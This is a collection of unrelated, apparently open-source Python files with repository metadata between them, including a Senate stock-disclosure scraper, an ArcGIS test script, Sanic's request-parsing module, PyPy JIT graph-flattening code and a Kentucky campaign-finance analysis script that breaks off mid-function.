expected_error_msg = "Error in Some Property. Invalid value for Category Exclusive: 50. Must be less than 50.0."
_Check(some_scalar, 50.0, "-", expected_error_msg)
# Test no error with exclusive -------------------------------------------------------------
_Check(some_scalar, 49.0, "-", None)
_Check(some_scalar, 2.0, "-", None)
| 38.418919
| 119
| 0.569117
|
4a15c0386228a1e0453d5b665e3b600c3bb35e37
| 1,612
|
py
|
Python
|
sec_scraper.py
|
bjk116/StockACTTracker
|
6d91dd49ca9aec3a005f6a681670da5ab0c7d4ca
|
[
"MIT"
] | null | null | null |
sec_scraper.py
|
bjk116/StockACTTracker
|
6d91dd49ca9aec3a005f6a681670da5ab0c7d4ca
|
[
"MIT"
] | null | null | null |
sec_scraper.py
|
bjk116/StockACTTracker
|
6d91dd49ca9aec3a005f6a681670da5ab0c7d4ca
|
[
"MIT"
] | null | null | null |
import requests
import datetime
# zach will need to install this
# pip install beautifulsoup4
# if that doesn't work
# pip3 install beautifulsoup4
from bs4 import BeautifulSoup
# pip3 install requests-html
# or
# pip install
# Required as sec website is created in js and needs to be rendered
from requests_html import HTMLSession
# comment out for now so this is runnable with minimimal install
#import db
#import queries
SEC_SENATE_STOCK_DISCLOSURE_URL = "https://sec.report/Senate-Stock-Disclosures"
# Possible transaction resource - DATA_SOURCE = "https://senate-stock-watcher-data.s3-us-west-2.amazonaws.com/aggregate/all_transactions_for_senators.json"
def getHTML():
session = HTMLSession()
r = session.get(SEC_SENATE_STOCK_DISCLOSURE_URL)
r.html.render(sleep=1, keep_page=True, scrolldown=1)
soup = BeautifulSoup(r.text, 'html.parser')
return soup
def getDataTable(soup):
return soup.find(class_='table')
def populateTransactions():
soup = getHTML()
table = getDataTable(soup)
# Construct columns
header_columns = []
for header in table.find_all('th'):
if len(header.find_all('a')) > 0:
for link in header.find_all('a'):
header_columns.append(link.text)
print(f"apeending link text {link.text}")
else:
print(f"appending header text {header.text}")
header_columns.append(header.text)
print(header_columns)
for row in table.tbody.find_all('tr'):
columns = row.find_all('td')
if len(columns) > 0:
pass
return table, header_columns
| 31
| 155
| 0.69727
|
4a15c18e5abaacb1f34bc0a0197b5c7e18538367
| 3,257
|
py
|
Python
|
data_management/test/test_scanned_map_tools/TemplateConfigTest.py
|
conklinbd/solutions-geoprocessing-toolbox
|
7afab793ea34b7e7cb7e32757e8a150b6637ffd2
|
[
"Apache-2.0"
] | null | null | null |
data_management/test/test_scanned_map_tools/TemplateConfigTest.py
|
conklinbd/solutions-geoprocessing-toolbox
|
7afab793ea34b7e7cb7e32757e8a150b6637ffd2
|
[
"Apache-2.0"
] | null | null | null |
data_management/test/test_scanned_map_tools/TemplateConfigTest.py
|
conklinbd/solutions-geoprocessing-toolbox
|
7afab793ea34b7e7cb7e32757e8a150b6637ffd2
|
[
"Apache-2.0"
] | 1
|
2018-10-25T15:52:41.000Z
|
2018-10-25T15:52:41.000Z
|
#------------------------------------------------------------------------------
# Copyright 2013 Esri
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#------------------------------------------------------------------------------
# TemplateConfigTest.py
# Description: Common objects/methods used by test scripts
# Requirements: ArcGIS Desktop Standard
# ----------------------------------------------------------------------------
import arcpy
import os
import sys
import traceback
import TestUtilities
try:
print("Testing ArcPy")
arcpy.AddMessage("ArcPy works")
# WORKAROUND: delete scratch db (having problems with scratch read-only "scheme lock" errors
# print "Deleting Scratch Workspace (Workaround)"
# TestUtilities.deleteScratch()
print("Testing Necessary Paths")
print("Running from: " + str(TestUtilities.currentPath))
paths2Check = []
paths2Check.extend([TestUtilities.geodatabasePath, TestUtilities.toolboxesPath,TestUtilities.sampleInputPath])
for path2check in paths2Check :
if os.path.exists(path2check) :
print("Valid Path: " + path2check)
else :
print("ERROR: Necessary Path not found: " + path2check )
raise Exception('Bad Path')
# WORKAROUND
# print "Creating New Scratch Workspace (Workaround)"
# TestUtilities.createScratch()
print "Testing Necessary Geo Objects"
objects2Check = []
objects2Check.extend([TestUtilities.toolbox, TestUtilities.inputGDB])
for object2Check in objects2Check :
desc = arcpy.Describe(object2Check)
if desc == None :
print("--> Invalid Object: " + str(object2Check) )
arcpy.AddError("Bad Input")
raise Exception('Bad Input')
else :
print("Valid Object: " + desc.Name )
print("Test Successful")
except arcpy.ExecuteError:
# Get the arcpy error messages
msgs = arcpy.GetMessages()
arcpy.AddError(msgs)
print(msgs)
# return a system error code
sys.exit(-1)
except:
# Get the traceback object
tb = sys.exc_info()[2]
tbinfo = traceback.format_tb(tb)[0]
# Concatenate information together concerning the error into a message string
pymsg = "PYTHON ERRORS:\nTraceback info:\n" + tbinfo + "\nError Info:\n" + str(sys.exc_info()[1])
msgs = "ArcPy ERRORS:\n" + arcpy.GetMessages() + "\n"
# Return python error messages for use in script tool or Python Window
arcpy.AddError(pymsg)
arcpy.AddError(msgs)
# Print Python error messages for use in Python / Python Window
print(pymsg + "\n")
print(msgs)
# return a system error code
sys.exit(-1)
| 34.284211
| 114
| 0.619896
|
4a15c22f97d5e055b3e5e40200f2ff49950ac12e
| 7,603
|
py
|
Python
|
sanic/request.py
|
matemax/sanic
|
ca419c151e404d8267434f42674d8c223b2edd60
|
[
"MIT"
] | 1
|
2019-08-04T09:42:09.000Z
|
2019-08-04T09:42:09.000Z
|
sanic/request.py
|
matemax/sanic
|
ca419c151e404d8267434f42674d8c223b2edd60
|
[
"MIT"
] | null | null | null |
sanic/request.py
|
matemax/sanic
|
ca419c151e404d8267434f42674d8c223b2edd60
|
[
"MIT"
] | 1
|
2019-08-04T09:42:10.000Z
|
2019-08-04T09:42:10.000Z
|
from cgi import parse_header
from collections import namedtuple
from http.cookies import SimpleCookie
from httptools import parse_url
from urllib.parse import parse_qs, urlunparse
try:
from ujson import loads as json_loads
except ImportError:
from json import loads as json_loads
from sanic.exceptions import InvalidUsage
from sanic.log import log
DEFAULT_HTTP_CONTENT_TYPE = "application/octet-stream"
# HTTP/1.1: https://www.w3.org/Protocols/rfc2616/rfc2616-sec7.html#sec7.2.1
# > If the media type remains unknown, the recipient SHOULD treat it
# > as type "application/octet-stream"
class RequestParameters(dict):
"""Hosts a dict with lists as values where get returns the first
value of the list and getlist returns the whole shebang
"""
def get(self, name, default=None):
"""Return the first value, either the default or actual"""
return super().get(name, [default])[0]
def getlist(self, name, default=None):
"""Return the entire list"""
return super().get(name, default)
class Request(dict):
"""Properties of an HTTP request such as URL, headers, etc."""
__slots__ = (
'app', 'headers', 'version', 'method', '_cookies', 'transport',
'body', 'parsed_json', 'parsed_args', 'parsed_form', 'parsed_files',
'_ip', '_parsed_url',
)
def __init__(self, url_bytes, headers, version, method, transport):
# TODO: Content-Encoding detection
self._parsed_url = parse_url(url_bytes)
self.app = None
self.headers = headers
self.version = version
self.method = method
self.transport = transport
# Init but do not inhale
self.body = []
self.parsed_json = None
self.parsed_form = None
self.parsed_files = None
self.parsed_args = None
self._cookies = None
@property
def json(self):
if self.parsed_json is None:
try:
self.parsed_json = json_loads(self.body)
except Exception:
if not self.body:
return None
raise InvalidUsage("Failed when parsing body as json")
return self.parsed_json
@property
def token(self):
"""Attempt to return the auth header token.
:return: token related to request
"""
auth_header = self.headers.get('Authorization')
if auth_header is not None:
return auth_header.split()[1]
return auth_header
@property
def form(self):
if self.parsed_form is None:
self.parsed_form = RequestParameters()
self.parsed_files = RequestParameters()
content_type = self.headers.get(
'Content-Type', DEFAULT_HTTP_CONTENT_TYPE)
content_type, parameters = parse_header(content_type)
try:
if content_type == 'application/x-www-form-urlencoded':
self.parsed_form = RequestParameters(
parse_qs(self.body.decode('utf-8')))
elif content_type == 'multipart/form-data':
# TODO: Stream this instead of reading to/from memory
boundary = parameters['boundary'].encode('utf-8')
self.parsed_form, self.parsed_files = (
parse_multipart_form(self.body, boundary))
except Exception:
log.exception("Failed when parsing form")
return self.parsed_form
@property
def files(self):
if self.parsed_files is None:
self.form # compute form to get files
return self.parsed_files
@property
def args(self):
if self.parsed_args is None:
if self.query_string:
self.parsed_args = RequestParameters(
parse_qs(self.query_string))
else:
self.parsed_args = RequestParameters()
return self.parsed_args
@property
def raw_args(self):
return {k: v[0] for k, v in self.args.items()}
@property
def cookies(self):
if self._cookies is None:
cookie = self.headers.get('Cookie') or self.headers.get('cookie')
if cookie is not None:
cookies = SimpleCookie()
cookies.load(cookie)
self._cookies = {name: cookie.value
for name, cookie in cookies.items()}
else:
self._cookies = {}
return self._cookies
@property
def ip(self):
if not hasattr(self, '_ip'):
self._ip = self.transport.get_extra_info('peername')
return self._ip
@property
def scheme(self):
if self.app.websocket_enabled \
and self.headers.get('upgrade') == 'websocket':
scheme = 'ws'
else:
scheme = 'http'
if self.transport.get_extra_info('sslcontext'):
scheme += 's'
return scheme
@property
def host(self):
# it appears that httptools doesn't return the host
# so pull it from the headers
return self.headers.get('Host', '')
@property
def path(self):
return self._parsed_url.path.decode('utf-8')
@property
def query_string(self):
if self._parsed_url.query:
return self._parsed_url.query.decode('utf-8')
else:
return ''
@property
def url(self):
return urlunparse((
self.scheme,
self.host,
self.path,
None,
self.query_string,
None))
File = namedtuple('File', ['type', 'body', 'name'])
def parse_multipart_form(body, boundary):
"""Parse a request body and returns fields and files
:param body: bytes request body
:param boundary: bytes multipart boundary
:return: fields (RequestParameters), files (RequestParameters)
"""
files = RequestParameters()
fields = RequestParameters()
form_parts = body.split(boundary)
for form_part in form_parts[1:-1]:
file_name = None
file_type = None
field_name = None
line_index = 2
line_end_index = 0
while not line_end_index == -1:
line_end_index = form_part.find(b'\r\n', line_index)
form_line = form_part[line_index:line_end_index].decode('utf-8')
line_index = line_end_index + 2
if not form_line:
break
colon_index = form_line.index(':')
form_header_field = form_line[0:colon_index]
form_header_value, form_parameters = parse_header(
form_line[colon_index + 2:])
if form_header_field == 'Content-Disposition':
if 'filename' in form_parameters:
file_name = form_parameters['filename']
field_name = form_parameters.get('name')
elif form_header_field == 'Content-Type':
file_type = form_header_value
post_data = form_part[line_index:-4]
if file_name or file_type:
file = File(type=file_type, name=file_name, body=post_data)
if field_name in files:
files[field_name].append(file)
else:
files[field_name] = [file]
else:
value = post_data.decode('utf-8')
if field_name in fields:
fields[field_name].append(value)
else:
fields[field_name] = [value]
return fields, files
| 31.288066
| 77
| 0.587137
|
4a15c288de720d5a2635472947e914c6bc72d8ae
| 2,160
|
py
|
Python
|
parser/fase2/team22/Instrucciones/FunctionTrigonometric/Atanh.py
|
Josue-Zea/tytus
|
f9e4be9a8c03eb698fade7a748972e4f52d46685
|
[
"MIT"
] | 35
|
2020-12-07T03:11:43.000Z
|
2021-04-15T17:38:16.000Z
|
parser/fase2/team22/Instrucciones/FunctionTrigonometric/Atanh.py
|
Josue-Zea/tytus
|
f9e4be9a8c03eb698fade7a748972e4f52d46685
|
[
"MIT"
] | 47
|
2020-12-09T01:29:09.000Z
|
2021-01-13T05:37:50.000Z
|
parser/fase2/team22/Instrucciones/FunctionTrigonometric/Atanh.py
|
Josue-Zea/tytus
|
f9e4be9a8c03eb698fade7a748972e4f52d46685
|
[
"MIT"
] | 556
|
2020-12-07T03:13:31.000Z
|
2021-06-17T17:41:10.000Z
|
import math
from Instrucciones.TablaSimbolos.Instruccion import Instruccion
from Instrucciones.TablaSimbolos.Tipo import Tipo_Dato, Tipo
from Instrucciones.Excepcion import Excepcion
from Instrucciones.TablaSimbolos import Instruccion3D as c3d
from Optimizador.C3D import Valor as ClassValor
from Optimizador.C3D import OP_ARITMETICO as ClassOP_ARITMETICO
from Optimizador.C3D import Identificador as ClassIdentificador
class Atanh(Instruccion):
def __init__(self, valor, strGram,linea, columna):
Instruccion.__init__(self,Tipo(Tipo_Dato.DOUBLE_PRECISION),linea,columna,strGram)
self.valor = valor
def ejecutar(self, tabla, arbol):
super().ejecutar(tabla,arbol)
resultado = self.valor.ejecutar(tabla,arbol)
if isinstance(resultado, Excepcion):
return resultado
if self.valor.tipo.tipo != Tipo_Dato.SMALLINT and self.valor.tipo.tipo != Tipo_Dato.INTEGER and self.valor.tipo.tipo != Tipo_Dato.BIGINT and self.valor.tipo.tipo != Tipo_Dato.DECIMAL and self.valor.tipo.tipo != Tipo_Dato.NUMERIC and self.valor.tipo.tipo != Tipo_Dato.REAL and self.valor.tipo.tipo != Tipo_Dato.DOUBLE_PRECISION:
error = Excepcion('42883',"Semántico","No existe la función atanh("+self.valor.tipo.toString()+")",self.linea,self.columna)
arbol.excepciones.append(error)
arbol.consola.append(error.toString())
return error
try:
return math.atanh(resultado)
except ValueError as c:
error = Excepcion('22003',"Semántico","La entrada está fuera de rango",self.linea,self.columna)
arbol.excepciones.append(error)
arbol.consola.append(error.toString())
return error
def generar3D(self, tabla, arbol):
super().generar3D(tabla,arbol)
code = []
code.append(c3d.asignacionH())
code.append(c3d.aumentarP())
t0 = c3d.getLastTemporal()
t1 = c3d.getTemporal()
code.append(c3d.operacion(t1, ClassIdentificador(t0), ClassValor("\"ATANH(" + str(self.valor.generar3D(tabla, arbol)) + ")\"", "STRING"), ClassOP_ARITMETICO.SUMA))
return code
| 51.428571
| 335
| 0.700926
|
4a15c36a1b3fa72126ffece343c99e4ff2f59867
| 15,109
|
py
|
Python
|
rpython/jit/codewriter/flatten.py
|
Qointum/pypy
|
c0ed88efbc135a75a535f4534ca1f3baf0bf39d8
|
[
"Apache-2.0",
"OpenSSL"
] | 34
|
2015-07-09T04:53:27.000Z
|
2021-07-19T05:22:27.000Z
|
idea2/pypyjs-3/deps/pypy/rpython/jit/codewriter/flatten.py
|
igormcoelho/neo-boa
|
c141b503183cab287744cd19be5dfd86d9bc8daf
|
[
"MIT"
] | 6
|
2015-05-30T17:20:45.000Z
|
2017-06-12T14:29:23.000Z
|
idea2/pypyjs-3/deps/pypy/rpython/jit/codewriter/flatten.py
|
igormcoelho/neo-boa
|
c141b503183cab287744cd19be5dfd86d9bc8daf
|
[
"MIT"
] | 11
|
2015-09-07T14:26:08.000Z
|
2020-04-10T07:20:41.000Z
|
from rpython.flowspace.model import Variable, Constant
from rpython.jit.metainterp.history import AbstractDescr, getkind
from rpython.rtyper.lltypesystem import lltype
class SSARepr(object):
def __init__(self, name):
self.name = name
self.insns = []
self._insns_pos = None # after being assembled
class Label(object):
def __init__(self, name):
self.name = name
def __repr__(self):
return "Label(%r)" % (self.name, )
def __eq__(self, other):
return isinstance(other, Label) and other.name == self.name
class TLabel(object):
def __init__(self, name):
self.name = name
def __repr__(self):
return "TLabel(%r)" % (self.name, )
def __eq__(self, other):
return isinstance(other, TLabel) and other.name == self.name
class Register(object):
def __init__(self, kind, index):
self.kind = kind # 'int', 'ref' or 'float'
self.index = index
def __repr__(self):
return "%%%s%d" % (self.kind[0], self.index)
class ListOfKind(object):
# a list of Regs/Consts, all of the same 'kind'.
# We cannot use a plain list, because we wouldn't know what 'kind' of
# Regs/Consts would be expected in case the list is empty.
def __init__(self, kind, content):
assert kind in KINDS
self.kind = kind
self.content = tuple(content)
def __repr__(self):
return '%s%s' % (self.kind[0].upper(), list(self.content))
def __iter__(self):
return iter(self.content)
def __nonzero__(self):
return bool(self.content)
def __eq__(self, other):
return (isinstance(other, ListOfKind) and
self.kind == other.kind and self.content == other.content)
class IndirectCallTargets(object):
def __init__(self, lst):
self.lst = lst # list of JitCodes
def __repr__(self):
return '<IndirectCallTargets>'
KINDS = ['int', 'ref', 'float']
# ____________________________________________________________
def flatten_graph(graph, regallocs, _include_all_exc_links=False):
"""Flatten the graph into an SSARepr, with already-computed register
allocations. 'regallocs' in a dict {kind: RegAlloc}."""
flattener = GraphFlattener(graph, regallocs, _include_all_exc_links)
flattener.enforce_input_args()
flattener.generate_ssa_form()
return flattener.ssarepr
class GraphFlattener(object):
def __init__(self, graph, regallocs, _include_all_exc_links=False):
self.graph = graph
self.regallocs = regallocs
self._include_all_exc_links = _include_all_exc_links
self.registers = {}
if graph:
name = graph.name
else:
name = '?'
self.ssarepr = SSARepr(name)
def enforce_input_args(self):
inputargs = self.graph.startblock.inputargs
numkinds = {}
for v in inputargs:
kind = getkind(v.concretetype)
if kind == 'void':
continue
curcol = self.regallocs[kind].getcolor(v)
realcol = numkinds.get(kind, 0)
numkinds[kind] = realcol + 1
if curcol != realcol:
assert curcol > realcol
self.regallocs[kind].swapcolors(realcol, curcol)
def generate_ssa_form(self):
self.seen_blocks = {}
self.make_bytecode_block(self.graph.startblock)
def make_bytecode_block(self, block):
if block.exits == ():
self.make_return(block.inputargs)
return
if block in self.seen_blocks:
self.emitline("goto", TLabel(block))
self.emitline("---")
return
# inserting a goto not necessary, falling through
self.seen_blocks[block] = True
self.emitline(Label(block))
#
operations = block.operations
for i, op in enumerate(operations):
self.serialize_op(op)
#
self.insert_exits(block)
def make_return(self, args):
if len(args) == 1:
# return from function
[v] = args
kind = getkind(v.concretetype)
if kind == 'void':
self.emitline("void_return")
else:
self.emitline("%s_return" % kind, self.getcolor(args[0]))
elif len(args) == 2:
# exception block, raising an exception from a function
if isinstance(args[1], Variable):
self.emitline("-live-") # xxx hack
self.emitline("raise", self.getcolor(args[1]))
else:
raise Exception("?")
self.emitline("---")
def make_link(self, link):
if (link.target.exits == ()
and link.last_exception not in link.args
and link.last_exc_value not in link.args):
self.make_return(link.args) # optimization only
return
self.insert_renamings(link)
self.make_bytecode_block(link.target)
def make_exception_link(self, link):
# Like make_link(), but also introduces the 'last_exception' and
# 'last_exc_value' as variables if needed. Also check if the link
# is jumping directly to the re-raising exception block.
assert link.last_exception is not None
assert link.last_exc_value is not None
if link.target.operations == () and link.args == [link.last_exception,
link.last_exc_value]:
self.emitline("reraise")
self.emitline("---")
return # done
self.make_link(link)
def insert_exits(self, block):
if len(block.exits) == 1:
# A single link, fall-through
link = block.exits[0]
assert link.exitcase in (None, False, True)
# the cases False or True should not really occur, but can show
# up in the manually hacked graphs for generators...
self.make_link(link)
#
elif block.canraise:
# An exception block. See test_exc_exitswitch in test_flatten.py
# for an example of what kind of code this makes.
index = -1
while True:
lastopname = block.operations[index].opname
if lastopname != '-live-':
break
index -= 1
assert block.exits[0].exitcase is None # is this always True?
#
if not self._include_all_exc_links:
if index == -1:
# cannot raise: the last instruction is not
# actually a '-live-'
self.make_link(block.exits[0])
return
#
self.emitline('catch_exception', TLabel(block.exits[0]))
self.make_link(block.exits[0])
self.emitline(Label(block.exits[0]))
for link in block.exits[1:]:
if (link.exitcase is Exception or
(link.exitcase is OverflowError and
lastopname.startswith('int_') and
lastopname.endswith('_ovf'))):
# this link captures all exceptions
self.make_exception_link(link)
break
self.emitline('goto_if_exception_mismatch',
Constant(link.llexitcase,
lltype.typeOf(link.llexitcase)),
TLabel(link))
self.make_exception_link(link)
self.emitline(Label(link))
else:
# no link captures all exceptions, so we have to put a reraise
# for the other exceptions
self.emitline("reraise")
self.emitline("---")
#
elif len(block.exits) == 2 and (
isinstance(block.exitswitch, tuple) or
block.exitswitch.concretetype == lltype.Bool):
# Two exit links with a boolean condition
linkfalse, linktrue = block.exits
if linkfalse.llexitcase == True:
linkfalse, linktrue = linktrue, linkfalse
opname = 'goto_if_not'
livebefore = False
if isinstance(block.exitswitch, tuple):
# special case produced by jtransform.optimize_goto_if_not()
opname = 'goto_if_not_' + block.exitswitch[0]
opargs = block.exitswitch[1:]
if opargs[-1] == '-live-before':
livebefore = True
opargs = opargs[:-1]
else:
assert block.exitswitch.concretetype == lltype.Bool
opargs = [block.exitswitch]
#
lst = self.flatten_list(opargs) + [TLabel(linkfalse)]
if livebefore:
self.emitline('-live-')
self.emitline(opname, *lst)
if not livebefore:
self.emitline('-live-', TLabel(linkfalse))
# true path:
self.make_link(linktrue)
# false path:
self.emitline(Label(linkfalse))
self.make_link(linkfalse)
#
else:
# A switch.
#
switches = [link for link in block.exits
if link.exitcase != 'default']
switches.sort(key=lambda link: link.llexitcase)
kind = getkind(block.exitswitch.concretetype)
assert kind == 'int' # XXX
#
# A switch on an integer, implementable efficiently with the
# help of a SwitchDictDescr. We use this even if there are
# very few cases: in pyjitpl.py, opimpl_switch() will promote
# the int only if it matches one of the cases.
from rpython.jit.codewriter.jitcode import SwitchDictDescr
switchdict = SwitchDictDescr()
switchdict._labels = []
self.emitline('-live-') # for 'guard_value'
self.emitline('switch', self.getcolor(block.exitswitch),
switchdict)
# emit the default path
if block.exits[-1].exitcase == 'default':
self.make_link(block.exits[-1])
else:
self.emitline("unreachable")
self.emitline("---")
#
for switch in switches:
key = lltype.cast_primitive(lltype.Signed,
switch.llexitcase)
switchdict._labels.append((key, TLabel(switch)))
# emit code for that path
# note: we need a -live- for all the 'guard_false' we produce
# if the switched value doesn't match any case.
self.emitline(Label(switch))
self.emitline('-live-')
self.make_link(switch)
def insert_renamings(self, link):
renamings = {}
lst = [(self.getcolor(v), self.getcolor(link.target.inputargs[i]))
for i, v in enumerate(link.args)
if v.concretetype is not lltype.Void and
v not in (link.last_exception, link.last_exc_value)]
lst.sort(key=lambda(v, w): w.index)
for v, w in lst:
if v == w:
continue
frm, to = renamings.setdefault(w.kind, ([], []))
frm.append(v)
to.append(w)
for kind in KINDS:
if kind in renamings:
frm, to = renamings[kind]
# Produce a series of %s_copy. If there is a cycle, it
# is handled with a %s_push to save the first value of
# the cycle, some number of %s_copy, and finally a
# %s_pop to load the last value.
result = reorder_renaming_list(frm, to)
for v, w in result:
if w is None:
self.emitline('%s_push' % kind, v)
elif v is None:
self.emitline('%s_pop' % kind, "->", w)
else:
self.emitline('%s_copy' % kind, v, "->", w)
self.generate_last_exc(link, link.target.inputargs)
def generate_last_exc(self, link, inputargs):
# Write 'last_exc_xxx' operations that load the last exception
# directly into the locations specified by 'inputargs'. This
# must be done at the end of the link renamings.
if link.last_exception is link.last_exc_value is None:
return
for v, w in zip(link.args, inputargs):
if v is link.last_exception:
self.emitline("last_exception", "->", self.getcolor(w))
for v, w in zip(link.args, inputargs):
if v is link.last_exc_value:
self.emitline("last_exc_value", "->", self.getcolor(w))
def emitline(self, *line):
self.ssarepr.insns.append(line)
def flatten_list(self, arglist):
args = []
for v in arglist:
if isinstance(v, Variable):
v = self.getcolor(v)
elif isinstance(v, Constant):
pass
elif isinstance(v, ListOfKind):
lst = [self.getcolor(x) for x in v]
v = ListOfKind(v.kind, lst)
elif isinstance(v, (AbstractDescr,
IndirectCallTargets)):
pass
else:
raise NotImplementedError(type(v))
args.append(v)
return args
def serialize_op(self, op):
args = self.flatten_list(op.args)
if op.result is not None:
kind = getkind(op.result.concretetype)
if kind != 'void':
args.append("->")
args.append(self.getcolor(op.result))
self.emitline(op.opname, *args)
def getcolor(self, v):
if isinstance(v, Constant):
return v
kind = getkind(v.concretetype)
col = self.regallocs[kind].getcolor(v) # if kind=='void', fix caller
try:
r = self.registers[kind, col]
except KeyError:
r = self.registers[kind, col] = Register(kind, col)
return r
# ____________________________________________________________
def reorder_renaming_list(frm, to):
result = []
pending_indices = range(len(to))
while pending_indices:
not_read = dict.fromkeys([frm[i] for i in pending_indices])
still_pending_indices = []
for i in pending_indices:
if to[i] not in not_read:
result.append((frm[i], to[i]))
else:
still_pending_indices.append(i)
if len(pending_indices) == len(still_pending_indices):
# no progress -- there is a cycle
assert None not in not_read
result.append((frm[pending_indices[0]], None))
frm[pending_indices[0]] = None
continue
pending_indices = still_pending_indices
return result
| 39.244156
| 79
| 0.551128
|
4a15c38ba93f38dec846a9c3f96eb8b3fd92d863
| 299
|
py
|
Python
|
data/clean_txt.py
|
iejMac/ScriptWriter
|
24358762643d48296a055850b82631877c04fe94
|
[
"MIT"
] | null | null | null |
data/clean_txt.py
|
iejMac/ScriptWriter
|
24358762643d48296a055850b82631877c04fe94
|
[
"MIT"
] | null | null | null |
data/clean_txt.py
|
iejMac/ScriptWriter
|
24358762643d48296a055850b82631877c04fe94
|
[
"MIT"
] | null | null | null |
import os
def get_txt(script_name):
with open(os.path.join(TXT_DIR, script_name), "r") as f:
st = f.read()
return st
TXT_DIR = "txt_dir"
scripts = os.listdir(TXT_DIR)
scripts = [get_txt(script_name) for script_name in scripts]
for script in scripts:
print(len(script))
| 10.310345
| 59
| 0.672241
|
4a15c3b71a2b00befe99c874ab3a2c8172f06a3f
| 14,430
|
py
|
Python
|
analyze.py
|
louisvillepublicmedia/2016-campaign-finance
|
fc54530356e3541ea750562fdb548f7dcdd0a124
|
[
"MIT"
] | null | null | null |
analyze.py
|
louisvillepublicmedia/2016-campaign-finance
|
fc54530356e3541ea750562fdb548f7dcdd0a124
|
[
"MIT"
] | null | null | null |
analyze.py
|
louisvillepublicmedia/2016-campaign-finance
|
fc54530356e3541ea750562fdb548f7dcdd0a124
|
[
"MIT"
] | null | null | null |
import agate, os, itertools, time, datetime, glob
from datetime import date
text_type = agate.Text()
tester = agate.TypeTester(force={
'contb_receipt_dt': agate.Text()
})
today = date.today()
datestamp = str(today.year) + str(today.month) + str(today.day)
ky_candidates_file = str(glob.glob('data/csv/process/*ky-candidate-contributions.csv')[0])
ky_all_contributions_file = str(glob.glob('data/csv/process/*ky-individual-contribs.csv')[0])
cmte_list_file = str(glob.glob('data/csv/process/*cmte-list.csv')[0])
ky_candidate_contributions = agate.Table.from_csv(ky_candidates_file, column_types=tester)
ky_all_contributions = agate.Table.from_csv(ky_all_contributions_file, delimiter='|')
cmte_list = agate.Table.from_csv(cmte_list_file, delimiter='|')
current_candidate_cmte_ids = ['C00580100','C00575795']
#Trump, Donald J. = C00580100
#Sanders, Bernard = C00577130
#Kasich, John R. = C00581876
#Clinton, Hillary Rodham = C00575795
#Cruz, Rafael Edward 'Ted' = C00574624
def print_state():
generated_js.write('state = "Kentucky"')
def print_updated():
generated_js.write('updated = "' + time.strftime("%x") + '"\n')
#print 'updated = "' + time.strftime("%x") + '"'
def print_ky_overall_summary():
# How much money has been donated by Kentuckians to the 2016 presidential race?
ky_contrib_sum = ky_all_contributions.aggregate(agate.Sum('TRANSACTION_AMT'))
# How many contributions have Kentuckians made to the presidential race?
ky_contrib_count = ky_all_contributions.aggregate(agate.Count())
print(str(ky_contrib_count) + ' donations, totaling $' + str(ky_contrib_sum) + ' have been donated by Kentuckians to the 2016 presidential race.')
generated_js.write('total_donated_sum = ' + str(ky_contrib_sum) + '\ntotal_donated_count = ' + str(ky_contrib_count) + '\n')
def print_ky_candidate_summary():
# How much money has been donated by Kentuckians to the presidential candidates?
ky_candidate_sum = ky_candidate_contributions.aggregate(agate.Sum('contb_receipt_amt'))
# How many contributions have Kentuckians made to presidential candidates?
ky_candidate_count = ky_candidate_contributions.aggregate(agate.Count())
print(str(ky_candidate_count) + ' donations, totaling $' + str(ky_candidate_sum) + ' have been donated by Kentuckians specifically to the 2016 presidential candidates.')
generated_js.write('total_candidate_donated_sum = ' + str(ky_candidate_sum) + '\ntotal_candidate_donated_count = ' + str(ky_candidate_count) + '\n')
# How much money has been donated by Kentuckians to the current 2016 presidential candidates?
def print_ky_current_candidate_sum():
current_cand_ky_contrib = ky_candidate_contributions.where(
lambda r: r['cmte_id'] in current_candidate_cmte_ids
)
ky_current_candidate_count = current_cand_ky_contrib.aggregate(agate.Count())
ky_current_candidate_sum = current_cand_ky_contrib.aggregate(agate.Sum('contb_receipt_amt'))
current_candidate_count = len(current_candidate_cmte_ids)
print('There are currently ' + str(current_candidate_count) + ' candidates running for president. Those ' + str(current_candidate_count) + ' candidates have received ' + str(ky_current_candidate_count) + ' donations totaling $' + str(ky_current_candidate_sum))
# Which committees are Republican and which are Democratic? This will come from
# cm16.csv file.
# How much money has been donated by Kentuckians to Democratic candidate committees? Republican candidate committees?
def print_contributions_by_cmte_type():
#republican_type = ['REP']
#democrate_type = ['DEM']
#
## Creating lists of republican and democratic cmte_ids
#rep_cmte_list = cmte_list.where(
# lambda r: r['CMTE_PTY_AFFILIATION'] in republican_type
#)
#dem_cmte_list = cmte_list.where(
# lambda r: r['CMTE_PTY_AFFILIATION'] in democrate_type
#)
#rep_cmte_id_list = []
#for row in rep_cmte_list.rows:
# rep_cmte_id_list.append(row['CMTE_ID'])
#dem_cmte_id_list = []
#for row in dem_cmte_list.rows:
# dem_cmte_id_list.append(row['CMTE_ID'])
rep_cmte_id_list = [
'C00579458', 'C00573519', 'C00580399', 'C00574624', 'C00577312',
'C00578757', 'C00577981', 'C00581876', 'C00575449', 'C00458844',
'C00578492', 'C00580100', 'C00580480'
]
# Jeb Bush = C00579458
# Carson = C00573519
# Christie = C00580399
# Cruz = C00574624
# Fiorino = C00577312
# Graham = C00578757
# Huckabee = C00577981
# Kasich = C00581876
# Paul = C00575449
# Rubio = C00458844
# Santorum = C00578492
# Trump = C00580100
# Walker = C00580480
dem_cmte_id_list = ['C00575795', 'C00583146', 'C00578658', 'C00577130', 'C00581215']
# Clinton = C00575795
# Lessig = C00583146
# OMalley = C00578658
# Sanders = C00577130
# Webb = C00581215
# Run through all the individual contributions and pull out the ones made
# to republican committees and then those made to democratic committees.
rep_contributions = ky_candidate_contributions.where(
lambda r: r['cmte_id'] in rep_cmte_id_list
)
dem_contributions = ky_candidate_contributions.where(
lambda r: r['cmte_id'] in dem_cmte_id_list
)
rep_contrib_count = rep_contributions.aggregate(agate.Count())
rep_contrib_sum = rep_contributions.aggregate(agate.Sum('contb_receipt_amt'))
print(str(rep_contrib_count) + ' contributions to Republican committees, totaling $' + str(rep_contrib_sum))
generated_js.write('to_republicans = ' + str(rep_contrib_sum) + '\n')
dem_contrib_count = dem_contributions.aggregate(agate.Count())
dem_contrib_sum = dem_contributions.aggregate(agate.Sum('contb_receipt_amt'))
